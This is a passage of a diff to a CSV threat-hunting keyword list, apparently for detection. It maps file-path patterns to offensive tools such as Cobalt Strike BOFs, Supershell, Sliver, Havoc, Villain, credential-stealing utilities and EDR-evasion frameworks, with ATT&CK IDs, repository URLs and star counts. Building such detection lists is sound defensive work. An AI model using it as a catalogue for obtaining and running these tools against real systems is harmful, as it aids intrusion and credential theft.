+"*/sudo_tracer.c*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*/sudomy.api*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" "*/sullo/nikto*","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" "*/sunlogin_rce*","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/sunlogin_rce","1","1","N/A","N/A","5","462","201","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z" "*/Sup3r-Us3r/scripts/*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*/supermicro-ipmi-conf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/Supernova.exe*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*/Supernova.git*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","337","49","2023-09-28T20:56:28Z","2023-08-08T11:30:34Z" -"*/SuperProfileDLL*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/Supershell.tar.gz*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*/supershell/login/auth*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*/Supershell/releases*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*/suspendresume.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/suspendresume.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/Supernova.exe*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*/Supernova.git*","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","4","347","50","2023-10-04T09:27:32Z","2023-08-08T11:30:34Z" +"*/SuperProfileDLL*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/Supershell.tar.gz*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*/supershell/login/auth*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*/Supershell/releases*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*/suspendresume.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/suspendresume.x86*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*/svn-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SweetPotato_CS*","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","10","10","236","49","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z" "*/Synergy-httpx.git*","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","108","14","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" -"*/syscalls/syscalls_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*/syscalls/syswhispers/*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*/syscalls/syswhispersv2*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/syscalls/syscalls_windows.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/syscalls/syswhispers/*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/syscalls/syswhispersv2*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*/SyscallsInject/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","475","115","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*/SysmonQuiet*","offensive_tool_keyword","sysmonquiet","RDLL for Cobalt Strike beacon to silence Sysmon process","T1055 - T1055.012 - T1063","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/ScriptIdiot/SysmonQuiet","1","1","N/A","N/A","1","81","15","2022-09-09T12:28:15Z","2022-07-11T14:17:34Z" "*/SysWhispers2*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" "*/SysWhispers3*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" "*/SysWhispers3.git*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" -"*/syswhispersv2*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*/t3l3machus/Villain*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*/syswhispersv2*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*/t3l3machus/Villain*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*/taidoor.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*/TakeMyRDP*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" -"*/Talon.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*/Talon/*Agent/Source*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*/Talon.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/Talon/*Agent/Source*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*/target:exe spacerunner.cs*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*/targetedKerberoast*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z" "*/targetedKerberoast.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" @@ -5540,25 +5600,26 @@ "*/Tash.dll*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/TashClient.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/TashLoader.*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*/tccbypass.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 